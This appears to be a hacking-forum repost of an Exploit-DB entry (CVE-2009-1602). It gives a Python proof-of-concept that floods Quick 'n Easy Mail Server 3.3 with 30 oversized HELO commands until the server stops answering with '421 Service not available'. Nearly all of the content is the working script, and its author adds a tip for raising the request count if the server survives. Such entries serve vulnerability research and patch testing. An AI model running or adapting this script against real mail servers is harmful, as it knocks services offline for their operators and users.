Exploit Quick 'n Easy Mail Server 3.3 (Demo) - Remote Denial of Service (PoC)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
8606
Проверка EDB
  1. Пройдено
Автор
SHINNAI
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2009-1602
Дата публикации
2009-05-04
Код:
# ---------------------------------------------------------------
# Quick 'n Easy Mail Server 3.3 (Demo) Remote Denial of Service
# http://www.pablosoftwaresolutions.com/

# author: shinnai
# mail: shinnai[at]autistici[dot]org
# site: http://www.shinnai.net/

# When you pass a long string to the server, it checks for bof
# type attacks and answers with a:
# "<SMTP> Buffer overflow: DOS attack?"
# after 25 requests (more or less), server is unable to handle
# errors.
# An attacker can exploit this issue to trigger dos conditions.
# In case of succesful exploitation of this vulnerability,
# the server will answer to requests as below:
# "<SMTP> 421 Service not available"
#---------------------------------------------------------------"

import socket

try:
   for i in range(1,30):
      s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      conn = s.connect(("127.0.0.1",25))
      s.send('HELO ' + "[email protected]" * 4000 + '\r\n')
      d = s.recv(1024)
      print d
      s.close
   raw_input("Done. If server is still available, try to increase the number of requests.\n\nPress enter to quit...")
except:
   raw_input("Unable to connect!\n\nPress enter to quit...")

# milw0rm.com [2009-05-04]
 
Источник
www.exploit-db.com

Похожие темы